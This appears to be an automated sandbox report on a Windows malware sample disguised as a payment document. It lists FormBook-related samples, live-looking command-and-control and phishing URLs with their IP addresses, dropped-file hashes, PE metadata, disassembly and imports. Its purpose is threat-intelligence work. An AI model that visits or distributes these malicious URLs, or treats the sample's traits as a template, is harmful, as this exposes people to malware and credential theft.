                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    172.67.155.214https://smail_blackfriday__bigusamail_2024-f084sf.storage.googleapis.com/SSSNNNXXXYYYPPPWWRRR_______________FGSD4065J1F%2BSSSCCRRBBBRR_________2.......HTMGet hashmaliciousPhisherBrowse
                                                      199.59.243.227new.exeGet hashmaliciousFormBookBrowse
                                                      • www.vavada-official.buzz/emhd/
                                                      PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                      • www.sob.rip/tp8k/
                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                      • ww1.hbohbomax.com/
                                                      ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                      • www.deadshoy.tech/0sq9/
                                                      PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                      • ww7.przvgke.biz/cairvr?usid=18&utid=28672493914
                                                      Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                      • www.solar-quotes.click/ubu8/
                                                      DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                      • www.whisperart.net/27s6/
                                                      QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                      • www.sfantulandrei.info/wvsm/
                                                      lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • www.bcg.services/5onp/
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • www.bcg.services/5onp/
                                                      84.32.84.32SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • www.activateya.life/f95q/
                                                      ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                      • www.thesnusgang.fun/z4qr/
                                                      DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                      • www.samundri.online/3ifu/
                                                      purchase order.exeGet hashmaliciousFormBookBrowse
                                                      • www.techmiseajour.net/jytl/
                                                      SRT68.exeGet hashmaliciousFormBookBrowse
                                                      • www.appsolucao.shop/qize/
                                                      Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                      • www.sido247.pro/073p/
                                                      SW_5724.exeGet hashmaliciousFormBookBrowse
                                                      • www.samundri.online/3ifu/
                                                      attached invoice.exeGet hashmaliciousFormBookBrowse
                                                      • www.techmiseajour.net/jytl/
                                                      attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.techmiseajour.net/jytl/
                                                      DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.samundri.online/5kax/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      94950.bodis.comnew.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      SHIPPING DOC.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      Purchase order MIPO2425110032.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      PI916810.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      SALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      Invoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      www.telepzow.fitACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                      • 104.21.64.208
                                                      www.y6h6kn.topACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                      • 162.251.95.62
                                                      www.deadshoy.techACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      NTT-LT-ASLTSHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 84.32.84.32
                                                      ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                      • 84.32.84.32
                                                      http://www.thehorizondispatch.comGet hashmaliciousUnknownBrowse
                                                      • 84.32.84.239
                                                      DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                      • 84.32.84.32
                                                      purchase order.exeGet hashmaliciousFormBookBrowse
                                                      • 84.32.84.32
                                                      Opportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msgGet hashmaliciousUnknownBrowse
                                                      • 84.32.84.93
                                                      iGxCM2I5u9.exeGet hashmaliciousFlesh StealerBrowse
                                                      • 84.32.84.100
                                                      iGxCM2I5u9.exeGet hashmaliciousUnknownBrowse
                                                      • 84.32.84.122
                                                      SRT68.exeGet hashmaliciousFormBookBrowse
                                                      • 84.32.84.32
                                                      http://editableslides.coGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                      • 84.32.84.208
                                                      CLOUDFLARENETUSSC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                      • 104.21.74.79
                                                      Quotation Request-349849.exeGet hashmaliciousFormBookBrowse
                                                      • 172.67.137.47
                                                      http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                      • 104.20.2.69
                                                      http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                      • 104.20.3.69
                                                      duschno.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                      • 172.67.74.152
                                                      Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                      • 162.159.137.232
                                                      file.exeGet hashmaliciousAmadey, LummaC Stealer, XmrigBrowse
                                                      • 172.67.139.78
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 172.67.192.146
                                                      https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.25.14
                                                      https://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156Get hashmaliciousTechSupportScamBrowse
                                                      • 1.1.1.1
                                                      DIGINET-AS-VNDigitaltelecomminicationservicejointstockhttp://103.23.144.53:15221/32A7E157.moeGet hashmaliciousUnknownBrowse
                                                      • 103.23.144.53
                                                      BODIS-NJUSnew.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                      • 199.59.243.227
                                                      Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      http://doctifyblog.comGet hashmaliciousUnknownBrowse
                                                      • 199.59.243.227
                                                      DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • 199.59.243.227

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Temp\Hymenophyllaceae

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Payment Copy #190922-001.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):287232
                                                      Entropy (8bit):7.993766009454213
                                                      Encrypted:true
                                                      SSDEEP:6144:6C+fRuxSJlsJ21eOGekDZhjvJAJ/JJAL19op8/TLh2AJ9trtg:U5sROGekHzJA3yvCwTLhjJ9Xg
                                                      MD5:F8F104B847CE08C8D2DE8DE58CCBE942
                                                      SHA1:A74D19F99A4A1A196BE0F5BFBCE5F6FC153FAC30
                                                      SHA-256:431F60B2EB8C660E1224D2BE82EB3CBFAE4F7B824FE7B2A44DFA67C9D2EEC2A2
                                                      SHA-512:CA2787E5199B713E27F5716FFFF70D12433C71EAF60A275415CB9AF90143A6F331DE5D2C1AF3A1158167B6719E5B103D4A085C447199D9C0E76B834D47454CD3
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:}..OY2E0@VE6..DZ.T0AG0K2.Z2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT.AG0E-.T2.9.w.7..e.?=Ca7B$U=;_eS%8+Y$z&?w&E/gY%...ae]+2 .]WN~WT0AG0KKNS.xP#.xV7.y:0.*...qR(.(.j%Q.@..hP&.b"Q'gR".DVE6PZDZ..0A.1J2..b.0DVE6PZD.WV1JF;K2.^2E0DVE6PZ.NWT0QG0KRKZ2EpDVU6PZFZWR0AG0K2O\2E0DVE6P:@ZWV0AG0K2MZr.0DFE6@ZDZWD0AW0K2OZ2U0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6~.!"#T0A..O2OJ2E0.RE6@ZDZWT0AG0K2OZ2e0D6E6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6P

                                                      C:\Users\user\AppData\Local\Temp\X0a-0531

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\xwizard.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3037001, page size 2048, file counter 5, database pages 57, cookie 0x25, schema 4, UTF-8, version-valid-for 5
                                                      Category:dropped
                                                      Size (bytes):120832
                                                      Entropy (8bit):1.2217911962382482
                                                      Encrypted:false
                                                      SSDEEP:192:U24ZY9FIH9pgXn0T+MbMHBddqqZKWAWF66iVumVe:U2x9Fa9pgn1BrqqZKWh4HVumVe
                                                      MD5:71A1F5964AE7880CEAA0C5BDEC3B7296
                                                      SHA1:EB1A527D05C1346DF353D3B7CD02D778A11CC3D5
                                                      SHA-256:8204A4BBEF749CAABB7FD7260E0EAFD1DCC05EAC8787AE0782F8909DE3CE07C4
                                                      SHA-512:F0DD94C28CA0AB24064AF17EE1753D67E9411F809D9114338B492CD619C428B7AB27E976FC44A35A3D0D76DB640BD5A0F1ABFF64F0DA7168DD259BF0910DA593
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:SQLite format 3......@ .......9...........%......................................................WI...........1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\aut316F.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Payment Copy #190922-001.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):287232
                                                      Entropy (8bit):7.993766009454213
                                                      Encrypted:true
                                                      SSDEEP:6144:6C+fRuxSJlsJ21eOGekDZhjvJAJ/JJAL19op8/TLh2AJ9trtg:U5sROGekHzJA3yvCwTLhjJ9Xg
                                                      MD5:F8F104B847CE08C8D2DE8DE58CCBE942
                                                      SHA1:A74D19F99A4A1A196BE0F5BFBCE5F6FC153FAC30
                                                      SHA-256:431F60B2EB8C660E1224D2BE82EB3CBFAE4F7B824FE7B2A44DFA67C9D2EEC2A2
                                                      SHA-512:CA2787E5199B713E27F5716FFFF70D12433C71EAF60A275415CB9AF90143A6F331DE5D2C1AF3A1158167B6719E5B103D4A085C447199D9C0E76B834D47454CD3
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:}..OY2E0@VE6..DZ.T0AG0K2.Z2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT.AG0E-.T2.9.w.7..e.?=Ca7B$U=;_eS%8+Y$z&?w&E/gY%...ae]+2 .]WN~WT0AG0KKNS.xP#.xV7.y:0.*...qR(.(.j%Q.@..hP&.b"Q'gR".DVE6PZDZ..0A.1J2..b.0DVE6PZD.WV1JF;K2.^2E0DVE6PZ.NWT0QG0KRKZ2EpDVU6PZFZWR0AG0K2O\2E0DVE6P:@ZWV0AG0K2MZr.0DFE6@ZDZWD0AW0K2OZ2U0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6~.!"#T0A..O2OJ2E0.RE6@ZDZWT0AG0K2OZ2e0D6E6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6P

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.183063563195928
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:Payment Copy #190922-001.exe
                                                      File size:1'201'664 bytes
                                                      MD5:6ad492e20a37cb8ae67231fa9059df17
                                                      SHA1:822ee5217bf832a320095b45a65c75d1f147bde8
                                                      SHA256:3c22db2dc305a5605630a009337d6dcf8ed36c132a5269b3fd6146a175813f67
                                                      SHA512:5e2f04f75b6b9c61a435f94fbb36ede8e5e09f3b1d5974c6fb8bfb0e7c6147cd2b1224ab060c3b048a70651b8fe86466e4fe03421bf7a88ddcb4228db93c3461
                                                      SSDEEP:24576:qu6J33O0c+JY5UZ+XC0kGso6FaHH0gQCb3igteIOtOZNFcWY:cu0c++OCvkGs9FaHH0gQCDtvOt+Y
                                                      TLSH:5D45CF2273DDC360CB669173BF69B7016EBF7C614630B85B2F880D7DA950162162DBA3
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                      File Icon

                                                      Icon Hash:aaf3e3e3938382a0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x427dcd
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x675AE4F9 [Thu Dec 12 13:28:25 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007F8908EC266Ah
                                                      jmp 00007F8908EB5434h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007F8908EB55BAh
                                                      cmp edi, eax
                                                      jc 00007F8908EB591Eh
                                                      bt dword ptr [004C31FCh], 01h
                                                      jnc 00007F8908EB55B9h
                                                      rep movsb
                                                      jmp 00007F8908EB58CCh
                                                      cmp ecx, 00000080h
                                                      jc 00007F8908EB5784h
                                                      mov eax, edi
                                                      xor eax, esi
                                                      test eax, 0000000Fh
                                                      jne 00007F8908EB55C0h
                                                      bt dword ptr [004BE324h], 01h
                                                      jc 00007F8908EB5A90h
                                                      bt dword ptr [004C31FCh], 00000000h
                                                      jnc 00007F8908EB575Dh
                                                      test edi, 00000003h
                                                      jne 00007F8908EB576Eh
                                                      test esi, 00000003h
                                                      jne 00007F8908EB574Dh
                                                      bt edi, 02h
                                                      jnc 00007F8908EB55BFh
                                                      mov eax, dword ptr [esi]
                                                      sub ecx, 04h
                                                      lea esi, dword ptr [esi+04h]
                                                      mov dword ptr [edi], eax
                                                      lea edi, dword ptr [edi+04h]
                                                      bt edi, 03h
                                                      jnc 00007F8908EB55C3h
                                                      movq xmm1, qword ptr [esi]
                                                      sub ecx, 08h
                                                      lea esi, dword ptr [esi+08h]
                                                      movq qword ptr [edi], xmm1
                                                      lea edi, dword ptr [edi+08h]
                                                      test esi, 00000007h
                                                      je 00007F8908EB5615h
                                                      bt esi, 03h
                                                      jnc 00007F8908EB5668h

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ASM] VS2013 build 21005
                                                      • [ C ] VS2013 build 21005
                                                      • [C++] VS2013 build 21005
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2013 UPD4 build 31101
                                                      • [RES] VS2013 build 21005
                                                      • [LNK] VS2013 UPD4 build 31101

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5cc58.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x711c.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xc70000x5cc580x5ce00a8c720a710d1263dc396eea8c91f9907False0.9287359101615074data7.897398953683963IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x1240000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                      RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                      RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                      RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                      RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                      RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                      RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                      RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                      RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                      RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                      RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                      RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                      RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                      RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                      RT_RCDATA0xcf7b80x53f1ddata1.0003228273862323
                                                      RT_GROUP_ICON0x1236d80x76dataEnglishGreat Britain0.6610169491525424
                                                      RT_GROUP_ICON0x1237500x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0x1237640x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0x1237780x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0x12378c0xdcdataEnglishGreat Britain0.6181818181818182
                                                      RT_MANIFEST0x1238680x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                      Imports

                                                      DLLImport
                                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                      PSAPI.DLLGetProcessMemoryInfo
                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                      UxTheme.dllIsThemeActive
                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
